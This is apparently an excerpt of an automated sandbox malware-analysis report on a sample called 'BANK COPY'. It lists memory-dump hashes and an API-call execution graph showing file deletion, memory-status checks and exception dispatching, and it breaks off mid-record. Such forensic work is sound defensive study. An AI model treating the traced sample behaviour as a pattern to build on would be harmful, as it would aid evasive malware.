                                                                                                    • Source File: 00000000.00000002.282812375.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e0d000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cab8f654c1932eb4cfbd45a5fd21c41a92bf2ed54904e4be405c30cd3e9458a4
                                                                                                    • Instruction ID: 86ed5abf5b9f228f41e9ffd983eed88e1043ec4ac33e4c463d87a4c32c375162
                                                                                                    • Opcode Fuzzy Hash: cab8f654c1932eb4cfbd45a5fd21c41a92bf2ed54904e4be405c30cd3e9458a4
                                                                                                    • Instruction Fuzzy Hash: 2C01D47150C3409AE7205A55CC84BA6FBE8EB82378F1C851BE9046B686D3799884C7B1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.282812375.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e0d000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b3d2bc2f63ce6807f9c2e44b0a50407750b1cf3e5f3bbcc44597d04f9fe546e1
                                                                                                    • Instruction ID: 4f42d8ef371bc667e0565694ca08065b9ff59e6062c2907ccf422f2452e9499e
                                                                                                    • Opcode Fuzzy Hash: b3d2bc2f63ce6807f9c2e44b0a50407750b1cf3e5f3bbcc44597d04f9fe546e1
                                                                                                    • Instruction Fuzzy Hash: 04F04F715082849EE7109E55DCC4BA2FBE8EB81778F18C55AED085A686C3799C84CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 'QsR$D0k
                                                                                                    • API String ID: 0-2312413296
                                                                                                    • Opcode ID: 5865a9fd94a38efb46fdf9eadeda39e189e5e836301de199e8adf4fcd9e2b8c9
                                                                                                    • Instruction ID: 46df050021a5eb6019d54d5ed178ee6b218d90ee6207e5a2bc86f758738bd85f
                                                                                                    • Opcode Fuzzy Hash: 5865a9fd94a38efb46fdf9eadeda39e189e5e836301de199e8adf4fcd9e2b8c9
                                                                                                    • Instruction Fuzzy Hash: CED19DB1F1521A9FCF14DFA5C4416FEBBB2BF89344F14842AD405AB354DB7899018FA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.284410430.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8644e2c68958442d3a4adf6aee07b366c50e84f8363f777f4a5757f4bc317aa9
                                                                                                    • Instruction ID: 87ea5375f7ec39f97fa9fe4f711c518e75a386db353cf2842927bb628c1cb527
                                                                                                    • Opcode Fuzzy Hash: 8644e2c68958442d3a4adf6aee07b366c50e84f8363f777f4a5757f4bc317aa9
                                                                                                    • Instruction Fuzzy Hash: 4312C6F9C917468BD310CF65E48C1893BE1B7E1328BD04A2AD2611BAD1DBB6D16BCF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.284410430.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 065779f0f28dec839420a9c0dd846f2299bd124aa08378999be536fa922ffc4b
                                                                                                    • Instruction ID: 73bcbc29cceb7ed04316a4bc3fcf9b0107b666ecd076051a7a1d53c1e4077be8
                                                                                                    • Opcode Fuzzy Hash: 065779f0f28dec839420a9c0dd846f2299bd124aa08378999be536fa922ffc4b
                                                                                                    • Instruction Fuzzy Hash: ECA15A36E00609CFCF15DFA5C98459EBBB2FF88304B15856AE906AB220EF31E955CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.284410430.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f5f1a64b6df4de4a5ea76b671368557e01f86be0d3d2c45838eb160c110410a7
                                                                                                    • Instruction ID: ea9da8ba533f679e15c48cd1e4b2aaa69dc913eacc07b9284c59a84e8a5d2ca1
                                                                                                    • Opcode Fuzzy Hash: f5f1a64b6df4de4a5ea76b671368557e01f86be0d3d2c45838eb160c110410a7
                                                                                                    • Instruction Fuzzy Hash: 52C15DB9C917058BD310CF65E8881893BE1FBE5328F904A29D2612B6D0DFB6D16BCF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 87c826f6809fd60643f2f58f0460dcf0f0050a91ab05edae10d5027a1ad0cc2d
                                                                                                    • Instruction ID: 526c007348dfc756e0443cbccd5ce4a44f9a7cb2d0dce72559e3dd3800d60317
                                                                                                    • Opcode Fuzzy Hash: 87c826f6809fd60643f2f58f0460dcf0f0050a91ab05edae10d5027a1ad0cc2d
                                                                                                    • Instruction Fuzzy Hash: A951FA72E056598FEB18CF679C402DAFBF3FFC9210F14C1AAC448AB265DB3006868E41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c0e8149e2b7cc1b11d612f3499734c71bc99e64f4b4d6d6a7340cf9254e1489b
                                                                                                    • Instruction ID: 324451a88404e6beb5a247de346fcf1866f2b3bdcdff0b9bbe5ad7f1aac7c579
                                                                                                    • Opcode Fuzzy Hash: c0e8149e2b7cc1b11d612f3499734c71bc99e64f4b4d6d6a7340cf9254e1489b
                                                                                                    • Instruction Fuzzy Hash: FA7104B4D1520ACFCB14CF99D4808EEFBF2FF89210F14991AD415AB214D334AA82CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3c98eb7f1b186e4735ab2b0ebad3429b8e7e25e8e84b7d7fd4c5a8b5552a6ce0
                                                                                                    • Instruction ID: fc31def3e0a3e9554bdebf03c1caecfeb8d601393e57e35783204c4edd5df553
                                                                                                    • Opcode Fuzzy Hash: 3c98eb7f1b186e4735ab2b0ebad3429b8e7e25e8e84b7d7fd4c5a8b5552a6ce0
                                                                                                    • Instruction Fuzzy Hash: 0B6112B4E1020ACFCB14CF99C4809EEFBF6FF89210F149916D414AB204D734AA82CF99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 422fae9ac7cc8092f8bb7435850810100717ad3a73c5af1559f08e2f8dad9a14
                                                                                                    • Instruction ID: b95dd3ae0b784a5f4dc0c9e5ea5ba8528eff8c6f69a9030247e2fe78e56689fa
                                                                                                    • Opcode Fuzzy Hash: 422fae9ac7cc8092f8bb7435850810100717ad3a73c5af1559f08e2f8dad9a14
                                                                                                    • Instruction Fuzzy Hash: 096148B4E1420ADFCB14CFA6D8805EEFBB6BF89310F14941AD511A7348D735AA42CFA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a24dc29073f87808c2f3176e5d1201ae0044197fee0ce75bb0641fcfa34d4fea
                                                                                                    • Instruction ID: aad6d858d2c174a0bb25c653791c46ddeb1e34909bca2a01eb83dd95e4845546
                                                                                                    • Opcode Fuzzy Hash: a24dc29073f87808c2f3176e5d1201ae0044197fee0ce75bb0641fcfa34d4fea
                                                                                                    • Instruction Fuzzy Hash: D26149B4E1420ADFCB14CFA6C8815EEFBB6FF89300F149426D511A7314D735AA468FA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3d5525ac2b5c7041fcc470de3082aa7ff102b11454a3b7707b86a7c592571c36
                                                                                                    • Instruction ID: df8952037980c3d2cec827cad26e6e33e276599c912d4b11bb6b9c62558f5580
                                                                                                    • Opcode Fuzzy Hash: 3d5525ac2b5c7041fcc470de3082aa7ff102b11454a3b7707b86a7c592571c36
                                                                                                    • Instruction Fuzzy Hash: 5561E5B0E15219CFCB18CFA9C9845EEFBF6FF89210F24982AD515B7314D734A9418BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 469c97bdbc81c993a3772aec74b440b265486eec1415cce3cad5e983109caca1
                                                                                                    • Instruction ID: 84411eb6d3a904039c99227ae5610ce346fb2f6c3cf964690182cad32439d6e6
                                                                                                    • Opcode Fuzzy Hash: 469c97bdbc81c993a3772aec74b440b265486eec1415cce3cad5e983109caca1
                                                                                                    • Instruction Fuzzy Hash: D261F8B0E152098FCB18CFA9C9845EEFBF6FF89210F28986AD515B7314D734A941CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2f57e8c94235ed46b78ee9707be846c62761ec9bf0e63bb19e0cd5f6deebdb2c
                                                                                                    • Instruction ID: a84c3ff3879fb0b6d808b754259b20a1fc3b0c12f5e193da79aff9bc010104ed
                                                                                                    • Opcode Fuzzy Hash: 2f57e8c94235ed46b78ee9707be846c62761ec9bf0e63bb19e0cd5f6deebdb2c
                                                                                                    • Instruction Fuzzy Hash: E25119B0D1560A9FCB58CFAAC4815EEFBF6FF98300F14D42AC415A7254D334AA428F99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a3d1e577fdd98729acdb7bea61c7ed0b6033db6f22577eed56d43ebf4a7069af
                                                                                                    • Instruction ID: fc28868f09f53278a3b73e6dbd0a7ee1d9b81d1b7980fa1cb8334fc93803d4bc
                                                                                                    • Opcode Fuzzy Hash: a3d1e577fdd98729acdb7bea61c7ed0b6033db6f22577eed56d43ebf4a7069af
                                                                                                    • Instruction Fuzzy Hash: 925109B0D1560A9FCB48CFAAC4815FEFBF6BF99300F14D42AC415A7254D334AA418F99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e3f4702ce996c853ad79cb5cba7a09e457815537c62572d3fa061fd684d2bde4
                                                                                                    • Instruction ID: 69682434b382ff08920e798253f06e74b6aeb7d397db7c2a6893a155fb4ccfa1
                                                                                                    • Opcode Fuzzy Hash: e3f4702ce996c853ad79cb5cba7a09e457815537c62572d3fa061fd684d2bde4
                                                                                                    • Instruction Fuzzy Hash: 1F41F4B0E1520ADFCB58CFA9C5815EEFBB6BB89310F24D56AC405B7214DB34AA418F94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0ff4dfeb1838daece57fd7ed58d807da75b83bfcda6eb9d9b8938f19f4ed54e1
                                                                                                    • Instruction ID: 64419932fd74de1cbf35962d0b4b9a0c34771035f75487db3dac2669ee9fc4c3
                                                                                                    • Opcode Fuzzy Hash: 0ff4dfeb1838daece57fd7ed58d807da75b83bfcda6eb9d9b8938f19f4ed54e1
                                                                                                    • Instruction Fuzzy Hash: 8F410BB0E1520ADFCB08CFA9C5414EEFBB6FB89310F24D56AC415B7254D734AA428B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e4dc22339d44b55c7cbb25e51a22cd31bff0c8271f1a48512540c4655c6c384b
                                                                                                    • Instruction ID: 251aa88137dfb19ddfae693c6b2838395f236f3a13fa06be096d583c276a6690
                                                                                                    • Opcode Fuzzy Hash: e4dc22339d44b55c7cbb25e51a22cd31bff0c8271f1a48512540c4655c6c384b
                                                                                                    • Instruction Fuzzy Hash: 11415EB1E156188BDB68CF6B8D452DAFAF3BFC9200F14C1BA950CA6264DB3419858E11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b14db0de72a6ac78b49e2532e4ee5431cce30633243591e1468b0b8081ad7033
                                                                                                    • Instruction ID: f731175d8ac135d300162c0b81fd328396c6d2576f2813a902b5070b818f7e6e
                                                                                                    • Opcode Fuzzy Hash: b14db0de72a6ac78b49e2532e4ee5431cce30633243591e1468b0b8081ad7033
                                                                                                    • Instruction Fuzzy Hash: 27315A70E156198FDB18CFAAD8816EEFBF2FFC9200F10C56AD408A7254DB305A018F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a86aa094c115d14cbc80af005aad307ee75ef9813275f91921978a17c57f7259
                                                                                                    • Instruction ID: a0ca78f9b4682998415bf82c650d20e08a8842b82e8f443aa2d311b499fbb7f9
                                                                                                    • Opcode Fuzzy Hash: a86aa094c115d14cbc80af005aad307ee75ef9813275f91921978a17c57f7259
                                                                                                    • Instruction Fuzzy Hash: 7311AAB1E146189BEB18CFABD8446DEFBF7AFC8200F04C17AD918B6264EB3415568F51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0ef09f77f7f2ff8dfe40b424baa6719a848b2dfd7a1df7cd19078282f1c8556d
                                                                                                    • Instruction ID: a23480ec8fae10a5540cadd732ceedac4d0d046efdfcbf16827aab62beca2f38
                                                                                                    • Opcode Fuzzy Hash: 0ef09f77f7f2ff8dfe40b424baa6719a848b2dfd7a1df7cd19078282f1c8556d
                                                                                                    • Instruction Fuzzy Hash: D411EFB1E046188BEB18CFABD8406DEFAF7BFCC200F04C17AC918A6214DB3415568F55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2228c82160270b1add6f8d3ffbe5bccb9b5ad28890811872cf3967df9cca4e05
                                                                                                    • Instruction ID: e67cfc1fc09fb02c9e6cc46478e15c45a7d14e69ff401409b80e5a346efe53e8
                                                                                                    • Opcode Fuzzy Hash: 2228c82160270b1add6f8d3ffbe5bccb9b5ad28890811872cf3967df9cca4e05
                                                                                                    • Instruction Fuzzy Hash: 8F119CB1E046189BEB5CCFABC8457DEFAF3ABC8200F08C17AD918B6254EB3455468E55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e5cbe5e5194a394cb855df6018e0eef3adf268a60cceeac2caec0b7051eb5b2d
                                                                                                    • Instruction ID: de69407071776e521c63c5a735d88ffb76e6e7117e0c64b46c28af1334dca3e8
                                                                                                    • Opcode Fuzzy Hash: e5cbe5e5194a394cb855df6018e0eef3adf268a60cceeac2caec0b7051eb5b2d
                                                                                                    • Instruction Fuzzy Hash: AD11D0B1E006188BEB58CFABC9457DEFAF3AFC8200F08C176C518A6258EB3455468E55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:20.6%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:1%
                                                                                                    Total number of Nodes:297
                                                                                                    Total number of Limit Nodes:16
                                                                                                    execution_graph 52854 690c640 GetCurrentProcess 52855 690c6b3 52854->52855 52856 690c6ba GetCurrentThread 52854->52856 52855->52856 52857 690c6f0 52856->52857 52858 690c6f7 GetCurrentProcess 52856->52858 52857->52858 52859 690c72d 52858->52859 52860 690c755 GetCurrentThreadId 52859->52860 52861 690c786 52860->52861 52862 62660d4 52863 62660dc 52862->52863 52867 6266248 52863->52867 52872 6266258 52863->52872 52864 626623e 52868 6266266 52867->52868 52869 6266289 52867->52869 52868->52864 52870 62662ae 52869->52870 52877 62657b4 52869->52877 52870->52864 52873 6266266 52872->52873 52874 6266289 52872->52874 52873->52864 52875 62662ae 52874->52875 52876 62657b4 DeleteFileW 52874->52876 52875->52864 52876->52875 52878 6266428 DeleteFileW 52877->52878 52880 62664a7 52878->52880 52880->52870 52881 6266115 52883 626611d 52881->52883 52882 626623e 52884 6266248 DeleteFileW 52883->52884 52885 6266258 DeleteFileW 52883->52885 52884->52882 52885->52882 52850 69764d0 52851 69764ef LdrInitializeThunk 52850->52851 52853 6976540 52851->52853 52886 690c868 DuplicateHandle 52887 690c8fe 52886->52887 52888 62665d8 52890 62665e1 52888->52890 52889 62666d9 52890->52889 52895 6266907 52890->52895 52900 62666df 52890->52900 52923 62668c1 52890->52923 52928 62666f0 52890->52928 52896 62668c0 52895->52896 52897 62668df 52896->52897 52951 6906570 52896->52951 52956 6906560 52896->52956 52897->52890 52901 626670f 52900->52901 52902 6266737 52901->52902 53006 6267925 52901->53006 53010 6267859 52901->53010 53014 62678de 52901->53014 53018 62677cb 52901->53018 53025 62674c5 52901->53025 53036 626757c 52901->53036 53047 6267671 52901->53047 53058 62676f6 52901->53058 53069 62675ed 52901->53069 53080 626796c 52901->53080 53084 6267812 52901->53084 53088 6267502 52901->53088 53099 6267784 52901->53099 53106 626773d 52901->53106 53115 626753f 52901->53115 53126 62675b0 52901->53126 53137 626762a 52901->53137 53148 62676af 52901->53148 53159 62674ae 52901->53159 53170 62678a0 52901->53170 52924 62668cf 52923->52924 52926 6906570 4 API calls 52924->52926 52927 6906560 4 API calls 52924->52927 52925 62668df 52925->52890 52926->52925 52927->52925 52929 626670f 52928->52929 52930 6266737 52929->52930 52931 6267925 KiUserExceptionDispatcher 52929->52931 52932 62678a0 KiUserExceptionDispatcher 52929->52932 52933 62674ae 5 API calls 52929->52933 52934 62676af 5 API calls 52929->52934 52935 626762a 5 API calls 52929->52935 52936 62675b0 5 API calls 52929->52936 52937 626753f 5 API calls 52929->52937 52938 626773d 4 API calls 52929->52938 52939 6267784 3 API calls 52929->52939 52940 6267502 5 API calls 52929->52940 52941 6267812 KiUserExceptionDispatcher 52929->52941 52942 626796c KiUserExceptionDispatcher 52929->52942 52943 62675ed 5 API calls 52929->52943 52944 62676f6 5 API calls 52929->52944 52945 6267671 5 API calls 52929->52945 52946 626757c 5 API calls 52929->52946 52947 62674c5 5 API calls 52929->52947 52948 62677cb 3 API calls 52929->52948 52949 62678de KiUserExceptionDispatcher 52929->52949 52950 6267859 KiUserExceptionDispatcher 52929->52950 52931->52930 52932->52930 52933->52930 52934->52930 52935->52930 52936->52930 52937->52930 52938->52930 52939->52930 52940->52930 52941->52930 52942->52930 52943->52930 52944->52930 52945->52930 52946->52930 52947->52930 52948->52930 52949->52930 52950->52930 52952 6906585 52951->52952 52953 6906864 52952->52953 52954 69078c8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 52952->52954 52961 6907abb 52952->52961 52953->52897 52954->52952 52958 6906585 52956->52958 52957 6906864 52957->52897 52958->52957 52959 69078c8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 52958->52959 52960 6907abb 4 API calls 52958->52960 52959->52958 52960->52958 52962 6907abc 52961->52962 52963 6907afe 52962->52963 52966 6907dd8 52962->52966 52971 6907dc9 52962->52971 52963->52952 52970 6907dc9 4 API calls 52966->52970 52984 6907e10 52966->52984 52993 6907e00 52966->52993 52967 6907de6 52967->52963 52970->52967 52972 6907e12 52971->52972 52973 6907dd2 52971->52973 52974 6907e1d 52972->52974 52976 6906434 GlobalMemoryStatusEx 52972->52976 52975 6907de6 52973->52975 52981 6907e10 2 API calls 52973->52981 52982 6907e00 2 API calls 52973->52982 52983 6907dc9 3 API calls 52973->52983 52974->52963 52975->52963 52980 6907e62 52976->52980 52977 6907f2e GlobalMemoryStatusEx 52978 6907f5e 52977->52978 52978->52963 52979 6907e66 52979->52963 52980->52977 52980->52979 52981->52975 52982->52975 52983->52975 52985 6907e45 52984->52985 52986 6907e1d 52984->52986 53002 6906434 52985->53002 52986->52967 52988 6907e66 52988->52967 52990 6907f2e GlobalMemoryStatusEx 52991 6907f5e 52990->52991 52991->52967 52992 6907ecb 52992->52967 52994 6907e45 52993->52994 52995 6907e1d 52993->52995 52996 6906434 GlobalMemoryStatusEx 52994->52996 52995->52967 52998 6907e62 52996->52998 52997 6907e66 52997->52967 52998->52997 52999 6907f2e GlobalMemoryStatusEx 52998->52999 53001 6907ecb 52998->53001 53000 6907f5e 52999->53000 53000->52967 53001->52967 53003 6907ee8 GlobalMemoryStatusEx 53002->53003 53005 6907e62 53003->53005 53005->52988 53005->52990 53005->52992 53007 6267937 53006->53007 53008 6267992 KiUserExceptionDispatcher 53007->53008 53009 62679ae 53008->53009 53009->52902 53011 626786b 53010->53011 53012 6267992 KiUserExceptionDispatcher 53011->53012 53013 62679ae 53012->53013 53013->52902 53015 62678f0 53014->53015 53016 6267992 KiUserExceptionDispatcher 53015->53016 53017 62679ae 53016->53017 53017->52902 53019 62677dd 53018->53019 53174 6972478 53019->53174 53179 6972418 53019->53179 53020 62677f7 53021 6267992 KiUserExceptionDispatcher 53020->53021 53022 62679ae 53021->53022 53022->52902 53026 62674d7 53025->53026 53027 6267722 53026->53027 53189 6971fa8 53026->53189 53028 6267763 KiUserExceptionDispatcher 53027->53028 53029 6267782 53028->53029 53034 6972418 2 API calls 53029->53034 53035 6972478 2 API calls 53029->53035 53030 62677f7 53031 6267992 KiUserExceptionDispatcher 53030->53031 53032 62679ae 53031->53032 53032->52902 53034->53030 53035->53030 53037 626758e 53036->53037 53038 6267722 53037->53038 53044 6971fa8 LdrInitializeThunk 53037->53044 53039 6267763 KiUserExceptionDispatcher 53038->53039 53040 6267782 53039->53040 53045 6972418 2 API calls 53040->53045 53046 6972478 2 API calls 53040->53046 53041 62677f7 53042 6267992 KiUserExceptionDispatcher 53041->53042 53043 62679ae 53042->53043 53043->52902 53044->53038 53045->53041 53046->53041 53048 6267683 53047->53048 53054 6267722 53048->53054 53055 6971fa8 LdrInitializeThunk 53048->53055 53049 6267763 KiUserExceptionDispatcher 53050 6267782 53049->53050 53056 6972418 2 API 